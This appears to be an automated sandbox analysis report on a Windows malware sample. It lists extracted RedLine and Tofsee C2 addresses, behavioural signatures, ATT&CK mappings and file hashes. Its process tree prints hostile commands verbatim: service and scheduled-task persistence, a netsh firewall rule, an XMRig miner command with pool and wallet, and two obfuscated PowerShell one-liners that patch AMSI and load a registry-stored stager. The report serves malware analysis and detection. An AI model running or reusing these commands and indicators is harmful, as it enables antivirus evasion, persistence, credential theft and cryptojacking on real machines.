Analysis

  • max time kernel
    72s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-09-2022 09:03

General

  • Target

    7c79df094c7e61fcf85d3d3c8cf18963f45acaef1a9adffc8dd168441d73a220.exe

  • Size

    169KB

  • MD5

    9f5cc04e24f8e20254689c4f3b6e4dab

  • SHA1

    23c5b0d13bb21baf6f9d5c56d83a79c61a34ae80

  • SHA256

    7c79df094c7e61fcf85d3d3c8cf18963f45acaef1a9adffc8dd168441d73a220

  • SHA512

    1ecfcf0821a2d29aef5e5be1ef36b891facb437b2b4195e4b4f7037268984ef74e9dd5b20e42179278ff5b5b6faa1245d8ad53bf89fba90fd3ae5560055639f4

  • SSDEEP

    3072:2QJLxN5RLbJi4j/tnOdiWwvQTJAB1uSLcS/PkW4n:bLx/i6OiiFTSL

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (Sup: @mr_golds)

C2

77.73.134.27:8163

Attributes
  • auth_value

    56c6f7b9024c076f0a96931453da7e56

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Extracted

Family

redline

Botnet

dantesoprano

C2

5.252.118.34:37991

Attributes
  • auth_value

    b5af0cad45273cbce8023bfa93cf0768

Signatures

  • Detects Smokeloader packer 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 11 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 8 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 26 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 61 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7c79df094c7e61fcf85d3d3c8cf18963f45acaef1a9adffc8dd168441d73a220.exe
    "C:\Users\Admin\AppData\Local\Temp\7c79df094c7e61fcf85d3d3c8cf18963f45acaef1a9adffc8dd168441d73a220.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:3776
  • C:\Users\Admin\AppData\Local\Temp\1ABC.exe
    C:\Users\Admin\AppData\Local\Temp\1ABC.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3512
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:65320
  • C:\Users\Admin\AppData\Local\Temp\1E47.exe
    C:\Users\Admin\AppData\Local\Temp\1E47.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:37172
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\grnjfouf\
      2⤵
        PID:65444
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gazypiva.exe" C:\Windows\SysWOW64\grnjfouf\
        2⤵
          PID:65520
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create grnjfouf binPath= "C:\Windows\SysWOW64\grnjfouf\gazypiva.exe /d\"C:\Users\Admin\AppData\Local\Temp\1E47.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:64912
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description grnjfouf "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:65012
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start grnjfouf
          2⤵
          • Launches sc.exe
          PID:65164
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:65248
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 37172 -s 1036
          2⤵
          • Program crash
          PID:65304
      • C:\Users\Admin\AppData\Local\Temp\21F1.exe
        C:\Users\Admin\AppData\Local\Temp\21F1.exe
        1⤵
        • Executes dropped EXE
        PID:65376
      • C:\Users\Admin\AppData\Local\Temp\28E8.exe
        C:\Users\Admin\AppData\Local\Temp\28E8.exe
        1⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of AdjustPrivilegeToken
        PID:64952
        • C:\Users\Admin\AppData\Local\Temp\syst.exe
          "C:\Users\Admin\AppData\Local\Temp\syst.exe"
          2⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          PID:744
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c schtasks /create /TN "$77host" /XML "C:\Windows\SysWOW64\$77Host.xml" /f
            3⤵
              PID:5240
              • C:\Windows\system32\schtasks.exe
                schtasks /create /TN "$77host" /XML "C:\Windows\SysWOW64\$77Host.xml" /f
                4⤵
                • Creates scheduled task(s)
                PID:5260
            • C:\Windows\SysWOW64\$77Install.exe
              "C:\Windows\SysWOW64\$77Install.exe"
              3⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              PID:5284
        • C:\Users\Admin\AppData\Local\Temp\2C44.exe
          C:\Users\Admin\AppData\Local\Temp\2C44.exe
          1⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:65120
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA4AA==
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4592
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 2080
              3⤵
              • Program crash
              PID:6244
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 65120 -s 1176
            2⤵
            • Program crash
            PID:5980
        • C:\Windows\SysWOW64\grnjfouf\gazypiva.exe
          C:\Windows\SysWOW64\grnjfouf\gazypiva.exe /d"C:\Users\Admin\AppData\Local\Temp\1E47.exe"
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:65216
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe
            2⤵
            • Sets service image path in registry
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Modifies data under HKEY_USERS
            PID:65344
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:112
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 65216 -s 532
            2⤵
            • Program crash
            PID:3636
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 37172 -ip 37172
          1⤵
            PID:65268
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 65216 -ip 65216
            1⤵
              PID:3352
            • C:\Users\Admin\AppData\Local\Temp\351F.exe
              C:\Users\Admin\AppData\Local\Temp\351F.exe
              1⤵
              • Executes dropped EXE
              PID:3728
            • C:\Users\Admin\AppData\Local\Temp\3D2E.exe
              C:\Users\Admin\AppData\Local\Temp\3D2E.exe
              1⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious use of AdjustPrivilegeToken
              PID:864
              • C:\Users\Admin\AppData\Local\Temp\bog923.exe.exe
                "C:\Users\Admin\AppData\Local\Temp\bog923.exe.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:4080
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  3⤵
                    PID:1696
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    3⤵
                      PID:5148
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 2004
                      3⤵
                      • Program crash
                      PID:6228
                • C:\Windows\SysWOW64\explorer.exe
                  C:\Windows\SysWOW64\explorer.exe
                  1⤵
                    PID:1424
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 780
                      2⤵
                      • Program crash
                      PID:6040
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    1⤵
                      PID:3592
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                        PID:4792
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 780
                          2⤵
                          • Program crash
                          PID:5924
                      • C:\Windows\explorer.exe
                        C:\Windows\explorer.exe
                        1⤵
                          PID:4736
                        • C:\Windows\SysWOW64\explorer.exe
                          C:\Windows\SysWOW64\explorer.exe
                          1⤵
                            PID:1016
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 776
                              2⤵
                              • Program crash
                              PID:6120
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                              PID:1556
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              1⤵
                                PID:1580
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe
                                1⤵
                                  PID:1256
                                • C:\Windows\SysWOW64\explorer.exe
                                  C:\Windows\SysWOW64\explorer.exe
                                  1⤵
                                    PID:632
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:qdVJiOflEdZW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cxWPrdutwrCcIA,[Parameter(Position=1)][Type]$wgQBQMjdSE)$WiIdozqnrrq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$WiIdozqnrrq.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$cxWPrdutwrCcIA).SetImplementationFlags('Runtime,Managed');$WiIdozqnrrq.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$wgQBQMjdSE,$cxWPrdutwrCcIA).SetImplementationFlags('Runtime,Managed');Write-Output $WiIdozqnrrq.CreateType();}$YnGoERehGSAOa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$uIfYCFKhJQVyxj=$YnGoERehGSAOa.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HXmgHXMOAnvJkzTREhH=qdVJiOflEdZW @([String])([IntPtr]);$IlEpxvJHjJnRjkKclgzJdM=qdVJiOflEdZW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GKHBHcQkCJu=$YnGoERehGSAOa.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MauUuqNPHBsaCV=$uIfYCFKhJQVyxj.Invoke($Null,@([Object]$GKHBHcQkCJu,[Object]('Load'+'LibraryA')));$KaOIiDdKYzMqSmzcp=$uIfYCFKhJQVyxj.Invoke($Null,@([Object]$GKHBHcQkCJu,[Object]('Vir'+'tual'+'Pro'+'tect')));$OlWZNuX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MauUuqNPHBsaCV,$HXmgHXMOAnvJkzTREhH).Invoke('a'+'m'+'si.dll');$FlxJcOMPQVEPtRYmg=$uIfYCFKhJQVyxj.Invoke($Null,@([Object]$OlWZNuX,[Object]('Ams'+'iSc'+'an'+'Buffer')));$PxdVxGnVNc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KaOIiDdKYzMqSmzcp,$IlEpxvJHjJnRjkKclgzJdM).Invoke($FlxJcOMPQVEPtRYmg,[uint32]8,4,[ref]$PxdVxGnVNc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$FlxJcOMPQVEPtRYmg,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KaOIiDdKYzMqSmzcp,$IlEpxvJHjJnRjkKclgzJdM).Invoke($FlxJcOMPQVEPtRYmg,[uint32]8,0x20,[ref]$PxdVxGnVNc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
                                    1⤵
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5324
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ttvGntZFvgfj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$sHuwBLatRJhgKc,[Parameter(Position=1)][Type]$rnCGqCDaKJ)$IXMDIYeJtgX=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$IXMDIYeJtgX.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$sHuwBLatRJhgKc).SetImplementationFlags('Runtime,Managed');$IXMDIYeJtgX.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$rnCGqCDaKJ,$sHuwBLatRJhgKc).SetImplementationFlags('Runtime,Managed');Write-Output $IXMDIYeJtgX.CreateType();}$fNLLBRThgqiou=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$gjwZdzdDxVfGJe=$fNLLBRThgqiou.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wzvQeoJeijrCyNqvnyU=ttvGntZFvgfj @([String])([IntPtr]);$aiyKFyKFuNdajrmPYtCNGd=ttvGntZFvgfj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wpnPksaKqFh=$fNLLBRThgqiou.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$EeEosUXptaveBY=$gjwZdzdDxVfGJe.Invoke($Null,@([Object]$wpnPksaKqFh,[Object]('Load'+'LibraryA')));$HxtvLtHPsiREsuHlN=$gjwZdzdDxVfGJe.Invoke($Null,@([Object]$wpnPksaKqFh,[Object]('Vir'+'tual'+'Pro'+'tect')));$qNMfDMs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EeEosUXptaveBY,$wzvQeoJeijrCyNqvnyU).Invoke('a'+'m'+'si.dll');$dfLBaPogTQLoHyIlb=$gjwZdzdDxVfGJe.Invoke($Null,@([Object]$qNMfDMs,[Object]('Ams'+'iSc'+'an'+'Buffer')));$fsVDhEPHTS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HxtvLtHPsiREsuHlN,$aiyKFyKFuNdajrmPYtCNGd).Invoke($dfLBaPogTQLoHyIlb,[uint32]8,4,[ref]$fsVDhEPHTS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dfLBaPogTQLoHyIlb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HxtvLtHPsiREsuHlN,$aiyKFyKFuNdajrmPYtCNGd).Invoke($dfLBaPogTQLoHyIlb,[uint32]8,0x20,[ref]$fsVDhEPHTS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
                                    1⤵
                                      PID:5332
                                    • C:\Windows\System32\dllhost.exe
                                      C:\Windows\System32\dllhost.exe /Processid:{95e55f8d-4aef-43cb-bed1-9ce6de43490b}
                                      1⤵
                                        PID:5572
                                      • C:\Windows\SysWOW64\dllhost.exe
                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{a46494db-9e28-4bca-9adb-743119da1943}
                                        1⤵
                                          PID:5692
                                        • C:\Windows\SysWOW64\dllhost.exe
                                          C:\Windows\SysWOW64\dllhost.exe /Processid:{a46494db-9e28-4bca-9adb-743119da1943}
                                          1⤵
                                            PID:5684
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{a46494db-9e28-4bca-9adb-743119da1943}
                                            1⤵
                                              PID:5676
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4792 -ip 4792
                                              1⤵
                                                PID:5828
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1016 -ip 1016
                                                1⤵
                                                  PID:5844
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1424 -ip 1424
                                                  1⤵
                                                    PID:5812
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1580 -ip 1580
                                                    1⤵
                                                      PID:5932
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1556 -ip 1556
                                                      1⤵
                                                        PID:5900
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 65120 -ip 65120
                                                        1⤵
                                                          PID:5892
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 632 -ip 632
                                                          1⤵
                                                            PID:5948
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5692 -ip 5692
                                                            1⤵
                                                              PID:6048
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5148 -ip 5148
                                                              1⤵
                                                                PID:5996
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4080 -ip 4080
                                                                1⤵
                                                                  PID:6096
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6096 -ip 6096
                                                                  1⤵
                                                                    PID:6168
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4592 -ip 4592
                                                                    1⤵
                                                                      PID:6132

                                                                    Network

                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                    Execution

                                                                    Scheduled Task

                                                                    1
                                                                    T1053

                                                                    Persistence

                                                                    New Service

                                                                    1
                                                                    T1050

                                                                    Modify Existing Service

                                                                    1
                                                                    T1031

                                                                    Registry Run Keys / Startup Folder

                                                                    1
                                                                    T1060

                                                                    Scheduled Task

                                                                    1
                                                                    T1053

                                                                    Privilege Escalation

                                                                    New Service

                                                                    1
                                                                    T1050

                                                                    Scheduled Task

                                                                    1
                                                                    T1053

                                                                    Defense Evasion

                                                                    Modify Registry

                                                                    1
                                                                    T1112

                                                                    Credential Access

                                                                    Credentials in Files

                                                                    2
                                                                    T1081

                                                                    Discovery

                                                                    Query Registry

                                                                    3
                                                                    T1012

                                                                    System Information Discovery

                                                                    3
                                                                    T1082

                                                                    Peripheral Device Discovery

                                                                    1
                                                                    T1120

                                                                    Collection

                                                                    Data from Local System

                                                                    2
                                                                    T1005

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\AppData\Local\Temp\1ABC.exe
                                                                      Filesize

                                                                      2.6MB

                                                                      MD5

                                                                      d5ecc2fd366dbd8d0cd3e9e8c8f5dbd8

                                                                      SHA1

                                                                      ed7413773b7c9154c9aeed9d173f61577522e0db

                                                                      SHA256

                                                                      576f224909dc7872b8c5bb4902d177f273c8d680c783454b1d43ad46bed7e983

                                                                      SHA512

                                                                      858db48785bef29d7d58bf2ff2b7e6c00537e63d2c571741d86ccd293d77abdaa19deab3a68352dae67e650e8da8a20ed7f38e1716af66e589c1c0d58de94bd5

                                                                    • C:\Users\Admin\AppData\Local\Temp\1ABC.exe
                                                                      Filesize

                                                                      2.6MB

                                                                      MD5

                                                                      d5ecc2fd366dbd8d0cd3e9e8c8f5dbd8

                                                                      SHA1

                                                                      ed7413773b7c9154c9aeed9d173f61577522e0db

                                                                      SHA256

                                                                      576f224909dc7872b8c5bb4902d177f273c8d680c783454b1d43ad46bed7e983

                                                                      SHA512

                                                                      858db48785bef29d7d58bf2ff2b7e6c00537e63d2c571741d86ccd293d77abdaa19deab3a68352dae67e650e8da8a20ed7f38e1716af66e589c1c0d58de94bd5

                                                                    • C:\Users\Admin\AppData\Local\Temp\1E47.exe
                                                                      Filesize

                                                                      169KB

                                                                      MD5

                                                                      937d518cedbd96f568b8a8b861ad13bd

                                                                      SHA1

                                                                      8d5418d47628f5de99303f39accfdfcf76026c48

                                                                      SHA256

                                                                      b3292f52ca6d204adb09a3e1a13790463d6f460d28bee6d6eaed3c3a5ee903a5

                                                                      SHA512

                                                                      c3feef99be4ff886172c3bfce53090bb0ae0460890a0d5abe194786e313dbc99ea8d41b70ffda0dfd1502615978082c9400b43c4ec752365c786d8c0932ce792

                                                                    • C:\Users\Admin\AppData\Local\Temp\1E47.exe
                                                                      Filesize

                                                                      169KB

                                                                      MD5

                                                                      937d518cedbd96f568b8a8b861ad13bd

                                                                      SHA1

                                                                      8d5418d47628f5de99303f39accfdfcf76026c48

                                                                      SHA256

                                                                      b3292f52ca6d204adb09a3e1a13790463d6f460d28bee6d6eaed3c3a5ee903a5

                                                                      SHA512

                                                                      c3feef99be4ff886172c3bfce53090bb0ae0460890a0d5abe194786e313dbc99ea8d41b70ffda0dfd1502615978082c9400b43c4ec752365c786d8c0932ce792

                                                                    • C:\Users\Admin\AppData\Local\Temp\21F1.exe
                                                                      Filesize

                                                                      395KB

                                                                      MD5

                                                                      a864c7dcd49506486eb4a15632a34c03

                                                                      SHA1

                                                                      6f247530bd632cb53cdc0b7a8c466e2144c16d84

                                                                      SHA256

                                                                      dc69e3a17aba90423107dc5915e8a32e76d92aca74323131b36cf9fb144ecdbf

                                                                      SHA512

                                                                      71ea6c60927c29d24a5cb992490e0b71b2c5355b01b4de739a44b4fed2b2315eb6b5081ee44c65b71b08f9c5e0d6591b9b6b7e136cb31a47581420bbe92b7a72

                                                                    • C:\Users\Admin\AppData\Local\Temp\21F1.exe
                                                                      Filesize

                                                                      395KB

                                                                      MD5

                                                                      a864c7dcd49506486eb4a15632a34c03

                                                                      SHA1

                                                                      6f247530bd632cb53cdc0b7a8c466e2144c16d84

                                                                      SHA256

                                                                      dc69e3a17aba90423107dc5915e8a32e76d92aca74323131b36cf9fb144ecdbf

                                                                      SHA512

                                                                      71ea6c60927c29d24a5cb992490e0b71b2c5355b01b4de739a44b4fed2b2315eb6b5081ee44c65b71b08f9c5e0d6591b9b6b7e136cb31a47581420bbe92b7a72

                                                                    • C:\Users\Admin\AppData\Local\Temp\28E8.exe
                                                                      Filesize

                                                                      381KB

                                                                      MD5

                                                                      f822288a43681e1a0d1fc6eca74c929c

                                                                      SHA1

                                                                      57d7b1830e03f4e9f3ad66ce1ae232789fa14fde

                                                                      SHA256

                                                                      6e3e2d9edb72aff201a38d229b2c3bab530e7486c0902021a2626ba6201941c1

                                                                      SHA512

                                                                      636b6e9781468a0fd2447534de56697cab8ba054d3c943511fd2efeccc6966f0f6f0c0b4c01ed3ce82657bcb4cf1ede182f61385268b08c837cc766e5128e2aa

                                                                    • C:\Users\Admin\AppData\Local\Temp\28E8.exe
                                                                      Filesize

                                                                      381KB

                                                                      MD5

                                                                      f822288a43681e1a0d1fc6eca74c929c

                                                                      SHA1

                                                                      57d7b1830e03f4e9f3ad66ce1ae232789fa14fde

                                                                      SHA256

                                                                      6e3e2d9edb72aff201a38d229b2c3bab530e7486c0902021a2626ba6201941c1

                                                                      SHA512

                                                                      636b6e9781468a0fd2447534de56697cab8ba054d3c943511fd2efeccc6966f0f6f0c0b4c01ed3ce82657bcb4cf1ede182f61385268b08c837cc766e5128e2aa

                                                                    • C:\Users\Admin\AppData\Local\Temp\2C44.exe
                                                                      Filesize

                                                                      1.1MB

                                                                      MD5

                                                                      ff97413fadad115998666fd129ccb86d

                                                                      SHA1

                                                                      152ca9dd31bf0c84f435154727186c8dca441f00

                                                                      SHA256

                                                                      6238542631b73f4d10cba3147b1e3326b01bc1f0ebf1cee83423eb2a4c9a6213

                                                                      SHA512

                                                                      2fdc2a83645d5764e81612903f6fd10581ba446bf52762f0cadc2b5e51b529dd522548c9545b4825b1924af4dc2556dfb1b3be0f6f94ffe7ef072511ef2f5c40

                                                                    • C:\Users\Admin\AppData\Local\Temp\2C44.exe
                                                                      Filesize

                                                                      1.1MB

                                                                      MD5

                                                                      ff97413fadad115998666fd129ccb86d

                                                                      SHA1

                                                                      152ca9dd31bf0c84f435154727186c8dca441f00

                                                                      SHA256

                                                                      6238542631b73f4d10cba3147b1e3326b01bc1f0ebf1cee83423eb2a4c9a6213

                                                                      SHA512

                                                                      2fdc2a83645d5764e81612903f6fd10581ba446bf52762f0cadc2b5e51b529dd522548c9545b4825b1924af4dc2556dfb1b3be0f6f94ffe7ef072511ef2f5c40

                                                                    • C:\Users\Admin\AppData\Local\Temp\351F.exe
                                                                      Filesize

                                                                      2.7MB

                                                                      MD5

                                                                      c0265881059ec2ecf23befda6fb64f9b

                                                                      SHA1

                                                                      8b7d0cd04f91bec9d379817c3adf0ddd81b7c544

                                                                      SHA256

                                                                      4b774adffc396f00368571a37a58c420ee4b9515c1440e32de91fb1a018acb4b

                                                                      SHA512

                                                                      0886c03d4c406eaffc0f60fa04a7e89c3d84feeb969148efc3738200cfec889d0b09cfe1248dfbe064a9472b03726d8ae24b647bf37047758bf06682b5effd57

                                                                    • C:\Users\Admin\AppData\Local\Temp\351F.exe
                                                                      Filesize

                                                                      2.7MB

                                                                      MD5

                                                                      c0265881059ec2ecf23befda6fb64f9b

                                                                      SHA1

                                                                      8b7d0cd04f91bec9d379817c3adf0ddd81b7c544

                                                                      SHA256

                                                                      4b774adffc396f00368571a37a58c420ee4b9515c1440e32de91fb1a018acb4b

                                                                      SHA512

